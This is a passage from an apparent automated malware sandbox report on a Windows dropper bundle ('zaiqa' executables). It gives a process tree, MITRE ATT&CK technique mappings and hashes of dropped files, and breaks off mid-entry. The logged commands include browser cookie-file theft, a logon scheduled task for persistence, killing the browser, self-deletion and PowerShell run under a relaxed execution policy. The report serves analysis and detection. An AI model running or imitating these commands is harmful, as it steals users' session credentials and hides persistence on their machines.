      - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        
        PID:6748
    - - C:\Users\Admin\Documents\ozPHOiI5ej5_cFdtkH9cSwjB.exe
        
        "C:\Users\Admin\Documents\ozPHOiI5ej5_cFdtkH9cSwjB.exe"
        5⤵
        
        PID:5360
    - - C:\Users\Admin\Documents\RaMfyFiT7yHLFvmalaW0v04Y.exe
        
        "C:\Users\Admin\Documents\RaMfyFiT7yHLFvmalaW0v04Y.exe"
        5⤵
        
        PID:5544
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspCFF5.tmp\tempfile.ps1"
        6⤵
        
        PID:3792
    - - C:\Users\Admin\Documents\zSYjFxE4usRRAdNcskj_0SBK.exe
        
        "C:\Users\Admin\Documents\zSYjFxE4usRRAdNcskj_0SBK.exe"
        5⤵
        
        PID:5492
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 644
        6⤵
        Program crash
        
        PID:5460
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 664
        6⤵
        Program crash
        
        PID:5296
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "zSYjFxE4usRRAdNcskj_0SBK.exe" /f & erase "C:\Users\Admin\Documents\zSYjFxE4usRRAdNcskj_0SBK.exe" & exit
        6⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "zSYjFxE4usRRAdNcskj_0SBK.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:6932
    - - C:\Users\Admin\Documents\oQSS9sJtQjFWnBuBIF9ajphe.exe
        
        "C:\Users\Admin\Documents\oQSS9sJtQjFWnBuBIF9ajphe.exe"
        5⤵
        
        PID:5484
    - - C:\Users\Admin\Documents\oNb12Y5sPHOMQDaB4Ys_jyOe.exe
        
        "C:\Users\Admin\Documents\oNb12Y5sPHOMQDaB4Ys_jyOe.exe"
        5⤵
        
        PID:5840
    - - C:\Users\Admin\Documents\ABgPfM5uJ5XychuGYf24U8Qn.exe
        
        "C:\Users\Admin\Documents\ABgPfM5uJ5XychuGYf24U8Qn.exe"
        5⤵
        
        PID:5864
    - - C:\Users\Admin\Documents\4TlSPp5_ySsISDS9RLRT5lHF.exe
        
        "C:\Users\Admin\Documents\4TlSPp5_ySsISDS9RLRT5lHF.exe"
        5⤵
        
        PID:6032
    - - C:\Users\Admin\Documents\sWCa0EyeNXeVhj_a3JvrmUQU.exe
        
        "C:\Users\Admin\Documents\sWCa0EyeNXeVhj_a3JvrmUQU.exe"
        5⤵
        
        PID:5976
    - - C:\Users\Admin\Documents\YRLeEAx9gn441wch9tDWfvRB.exe
        
        "C:\Users\Admin\Documents\YRLeEAx9gn441wch9tDWfvRB.exe"
        5⤵
        
        PID:5908
    - - C:\Users\Admin\Documents\sd3JGz9Nx0XVZmu8NQcDc_kH.exe
        
        "C:\Users\Admin\Documents\sd3JGz9Nx0XVZmu8NQcDc_kH.exe"
        5⤵
        
        PID:5096
      - C:\Users\Admin\Documents\sd3JGz9Nx0XVZmu8NQcDc_kH.exe
        
        "C:\Users\Admin\Documents\sd3JGz9Nx0XVZmu8NQcDc_kH.exe" -q
        6⤵
        
        PID:2320
    - - C:\Users\Admin\Documents\RB3mSKZgePNT2IjH_xqmAuET.exe
        
        "C:\Users\Admin\Documents\RB3mSKZgePNT2IjH_xqmAuET.exe"
        5⤵
        
        PID:4948
    - - C:\Users\Admin\Documents\NI9SBisTfoJUOjIMHENrKmzM.exe
        
        "C:\Users\Admin\Documents\NI9SBisTfoJUOjIMHENrKmzM.exe"
        5⤵
        
        PID:5340
      - C:\Users\Admin\AppData\Local\Temp\is-QEDU8.tmp\NI9SBisTfoJUOjIMHENrKmzM.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QEDU8.tmp\NI9SBisTfoJUOjIMHENrKmzM.tmp" /SL5="$30204,138429,56832,C:\Users\Admin\Documents\NI9SBisTfoJUOjIMHENrKmzM.exe"
        6⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\is-65617.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-65617.tmp\Setup.exe" /Verysilent
        7⤵
        
        PID:6828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_8.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_8.exe
      zaiqa_8.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3700
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        Executes dropped EXE
        
        PID:4920
      - C:\Users\Admin\AppData\Local\Temp\2no.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2no.exe"
        6⤵
        
        PID:2092
      - C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        6⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        7⤵
        
        PID:4672
      - C:\Users\Admin\AppData\Local\Temp\askinstall54.exe
        
        "C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"
        6⤵
        
        PID:2596
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:4348
      - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        6⤵
        
        PID:4060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:5652
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:5760
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:7052
      - C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe"
        6⤵
        
        PID:4700
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4700 -s 1508
        7⤵
        Program crash
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        6⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6300
      - C:\Users\Admin\AppData\Local\Temp\mysetnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mysetnew.exe"
        6⤵
        
        PID:4084
      - C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe"
        6⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Roaming\1619635.exe
        
        "C:\Users\Admin\AppData\Roaming\1619635.exe"
        7⤵
        
        PID:6616
        
        C:\Users\Admin\AppData\Roaming\6557837.exe
        
        "C:\Users\Admin\AppData\Roaming\6557837.exe"
        7⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Roaming\2292113.exe
        
        "C:\Users\Admin\AppData\Roaming\2292113.exe"
        7⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Roaming\4717428.exe
        
        "C:\Users\Admin\AppData\Roaming\4717428.exe"
        7⤵
        
        PID:6716
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 796
        7⤵
        Program crash
        
        PID:1704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 932
        7⤵
        Program crash
        
        PID:5956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 920
        7⤵
        Program crash
        
        PID:4324
      - C:\Users\Admin\AppData\Local\Temp\setup329.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup329.exe"
        6⤵
        
        PID:5528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_9.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_9.exe
      zaiqa_9.exe
      4⤵
      Executes dropped EXE
      PID:2076
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4256
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5176
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5924
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2644
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2076 -s 792
        5⤵
        Program crash
        
        PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_2.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672

C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_2.exe
zaiqa_2.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3676

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5584
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6076

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4968
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6148

C:\Users\Admin\AppData\Roaming\uvabsft
C:\Users\Admin\AppData\Roaming\uvabsft
1⤵
PID:1504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5
f7dcb24540769805e5bb30d193944dce

SHA1
e26c583c562293356794937d9e2e6155d15449ee

SHA256
6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

SHA512
cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5
b1984c142d178dd4a7d8bc5472e766a1

SHA1
e15c3d475cfb3ace05f288ff4931d606d979677a

SHA256
35e33ce28b54798ff9a160924bf9eb3717e0fe4fb1c1c150d6875715e6bc52f5

SHA512
936150262ac34949f68df02e809a8733ace1aa0d924f967cf226c0b23f45c80ee277c75d9b1d41f5131fcbe09047a6d3b7f84cdf86d6018ea5731465e605d0e8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5
3efaeefbe7895da3eb16fb6d98f64901

SHA1
97f1909eb8c2e93a36e77d399b0e7e6e62e1cb5e

SHA256
736f68680aadecdf9ca2e38a56312e1b833d6ed77951d9fa5c53abf242cf5b7a

SHA512
439819382c6f695cf5cb62084400d67433c528c52822f17b52116f4267c67e89f4f0be1854e95107bcad07365b9b94ebcc1a4f701ee87d9fde7702d76ae8e91f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5
8a7154666a853acf2aa626609a852491

SHA1
32b510222d725753287514a331b4c22994b92760

SHA256
eb34104a30838c24dfe98844768bfaf9718a1bcb4bccf23f764f99e6267a46fc

SHA512
44d7a54864d341e2b9185acc7c742ff5f5d07c4d33cda376b98624483c9c5c4125979d3455b7f172830c9bcfbe0257fa6096c3d0ebb65ca09afed82aae4dc939

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5
94ebb6efdfeb6c32c608307ad3ee1f19

SHA1
da1e49ca3370b72f778b929e0a7e00087acb0cbb

SHA256
aae2a4546a2face362475af5ca596ee1f6756a0ef7bea3b01c3932979842b2da

SHA512
04574b92b4e4ab9d19b830ad3a83d804020d5242dd0a991a25e932a9d0c3865f8c044a66177728e73d945d7d1f65ef759742ffaebe0196ad859d8784c64fdf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\11111.exe

MD5
cc0d6b6813f92dbf5be3ecacf44d662a

SHA1
b968c57a14ddada4128356f6e39fb66c6d864d3f

SHA256
0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

SHA512
4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2no.exe

MD5
a184fb9439436d65ee5879b3ab511828

SHA1
db6e07aafefbc89a0b3a51c0b4768f5a33d74f34

SHA256
4e5a49a02dd6c3d9c08f782ebab2fd56c1296ab20149a36f340fd24404140a26

SHA512
8683de03dc56c26656129b35f9dbbfbd8f4a3f9bac7900273171bcb1267828d28f0f1c4d31a99859f8ae85d38cc9741c49ad3e5396dc1ef4cc863ddaa6d6d468

Download Submit
C:\Users\Admin\AppData\Local\Temp\2no.exe

MD5
a184fb9439436d65ee5879b3ab511828

SHA1
db6e07aafefbc89a0b3a51c0b4768f5a33d74f34

SHA256
4e5a49a02dd6c3d9c08f782ebab2fd56c1296ab20149a36f340fd24404140a26

SHA512
8683de03dc56c26656129b35f9dbbfbd8f4a3f9bac7900273171bcb1267828d28f0f1c4d31a99859f8ae85d38cc9741c49ad3e5396dc1ef4cc863ddaa6d6d468

Download Submit
C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5
e511bb4cf31a2307b6f3445a869bcf31

SHA1
76f5c6e8df733ac13d205d426831ed7672a05349

SHA256
56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

SHA512
9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5
e511bb4cf31a2307b6f3445a869bcf31

SHA1
76f5c6e8df733ac13d205d426831ed7672a05349

SHA256
56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

SHA512
9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurl.dll

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurlpp.dll

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libgcc_s_dw2-1.dll

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libstdc++-6.dll

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libwinpthread-1.dll

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe

MD5
a52a590e1f8f93cd1d4108293415975c

SHA1
49db2a15b6f32c6189f24a8ae6e4bb33d0485f05

SHA256
12d2f007dcc8cb316493fe0f61fd330fdec70f872ae81693e12f9fcc47590149

SHA512
47893f8117466821b89b29836e638bc76d2ee93e57179ba49d2242eb066fa01ff4e0033f194099065e29278b4d4ba653cca00e270f85ccd6cb91b7d3285d6161

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe

MD5
a52a590e1f8f93cd1d4108293415975c

SHA1
49db2a15b6f32c6189f24a8ae6e4bb33d0485f05

SHA256
12d2f007dcc8cb316493fe0f61fd330fdec70f872ae81693e12f9fcc47590149

SHA512
47893f8117466821b89b29836e638bc76d2ee93e57179ba49d2242eb066fa01ff4e0033f194099065e29278b4d4ba653cca00e270f85ccd6cb91b7d3285d6161

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.exe

MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.exe

MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.txt

MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_2.exe

MD5
44dc205a5701b53f391a3a750c2c4712

SHA1
14e82b1f6bb987d8f2783db2ab5f82dd9ab8eacc

SHA256
508c41442ba856a3266b3e58a31fe8c4b0ad7491e04dfead265daaa028efd768

SHA512
02890434c81867499e0911e8062797bf7fc184e05b6de2ab14ffa6f95c48f88e07250b4e5a7ff565bbf45d66d8d7cb5c1009b85085ee3a6bbdac218f356c5749

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_2.txt

MD5
44dc205a5701b53f391a3a750c2c4712

SHA1
14e82b1f6bb987d8f2783db2ab5f82dd9ab8eacc

SHA256
508c41442ba856a3266b3e58a31fe8c4b0ad7491e04dfead265daaa028efd768

SHA512
02890434c81867499e0911e8062797bf7fc184e05b6de2ab14ffa6f95c48f88e07250b4e5a7ff565bbf45d66d8d7cb5c1009b85085ee3a6bbdac218f356c5749

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_3.exe

MD5
8595f5515fac09b73ff463056cb07a15

SHA1
80f39da9a52cffb70edaa4d7de82f543ba4d417e

SHA256
8223619e305ec5063e9e2c1490fa25f6e924c317b08fd5eed938bb5de2e57de1

SHA512
26f0a15484a8780fedcea91f9d90ab4b81a91598fad4cad54f45fd18eccf73914215851909bf8acadeafc7b89c656c98ec988a46aa43e17a364b39b5d8ac477a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_3.txt

MD5
8595f5515fac09b73ff463056cb07a15

SHA1
80f39da9a52cffb70edaa4d7de82f543ba4d417e

SHA256
8223619e305ec5063e9e2c1490fa25f6e924c317b08fd5eed938bb5de2e57de1

SHA512
26f0a15484a8780fedcea91f9d90ab4b81a91598fad4cad54f45fd18eccf73914215851909bf8acadeafc7b89c656c98ec988a46aa43e17a364b39b5d8ac477a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_4.exe

MD5
13a289feeb15827860a55bbc5e5d498f

SHA1
e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad

SHA256
c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775

SHA512
00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_4.txt

MD5
13a289feeb15827860a55bbc5e5d498f

SHA1
e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad

SHA256
c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775

SHA512
00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_5.exe

MD5
8cad9c4c58553ec0ca5fd50aec791b8a

SHA1
a2a4385cb2df58455764eb879b5d6aaf5e3585ac

SHA256
f092024f873461b61234b97fcb07c8589dcc9a801cf8a0a6e302dbd746bab294

SHA512
1eeac808dd992a7b99448d8a1c5470a2964b14705b4e987d9cb2e227a8142122faa17bf8a9acba6db4e80a42b50b58536e748a3231736b9b705d630f941159a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_5.txt

MD5
8cad9c4c58553ec0ca5fd50aec791b8a

SHA1
a2a4385cb2df58455764eb879b5d6aaf5e3585ac

SHA256
f092024f873461b61234b97fcb07c8589dcc9a801cf8a0a6e302dbd746bab294

SHA512
1eeac808dd992a7b99448d8a1c5470a2964b14705b4e987d9cb2e227a8142122faa17bf8a9acba6db4e80a42b50b58536e748a3231736b9b705d630f941159a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_6.exe

MD5
28e40b1adae683f70b178d025ea7bf64

SHA1
24851934bbb9a67c6d07e48503e6296c91fff502

SHA256
1cde227af526781ff9553ffef5d3eb52bc5e78240150d8bddd20644f4bf80af5

SHA512
f02b499b6e10411affba70caf96694f6297f6b754c00b6a179421f5aa21a21bb8f8863d87fea358a280979dfede22a06188abc695e5be4ed578bb60d73aada57

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_6.txt

MD5
28e40b1adae683f70b178d025ea7bf64

SHA1
24851934bbb9a67c6d07e48503e6296c91fff502

SHA256
1cde227af526781ff9553ffef5d3eb52bc5e78240150d8bddd20644f4bf80af5

SHA512
f02b499b6e10411affba70caf96694f6297f6b754c00b6a179421f5aa21a21bb8f8863d87fea358a280979dfede22a06188abc695e5be4ed578bb60d73aada57

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_7.exe

MD5
fdaa4ceadfc95047aa93dbd903669f25

SHA1
97549c52142d192383e8f2018141901a1a0ec112

SHA256
22af1522526444b485228e2021f039523e03003bd1ab68b6da275b69c96b018b

SHA512
598e77c39f5e443228a7f1926540ad3ffa6eaf8bb9b7f10be9e24fd49f96446511166f0750deebe708a7dbb2d8bb98adcdd330132a24fd932f75068f6524c696

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_7.txt

MD5
fdaa4ceadfc95047aa93dbd903669f25

SHA1
97549c52142d192383e8f2018141901a1a0ec112

SHA256
22af1522526444b485228e2021f039523e03003bd1ab68b6da275b69c96b018b

SHA512
598e77c39f5e443228a7f1926540ad3ffa6eaf8bb9b7f10be9e24fd49f96446511166f0750deebe708a7dbb2d8bb98adcdd330132a24fd932f75068f6524c696

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_8.exe

MD5
c85639691074f9d98ec530901c153d2b

SHA1
cac948e5b1f9d7417e7c5ead543fda1108f0e9ed

SHA256
55701c6e51fb6a9820d8f9d2ae9db412b60f51c80d288e8baf0ea50e2d03cce4

SHA512
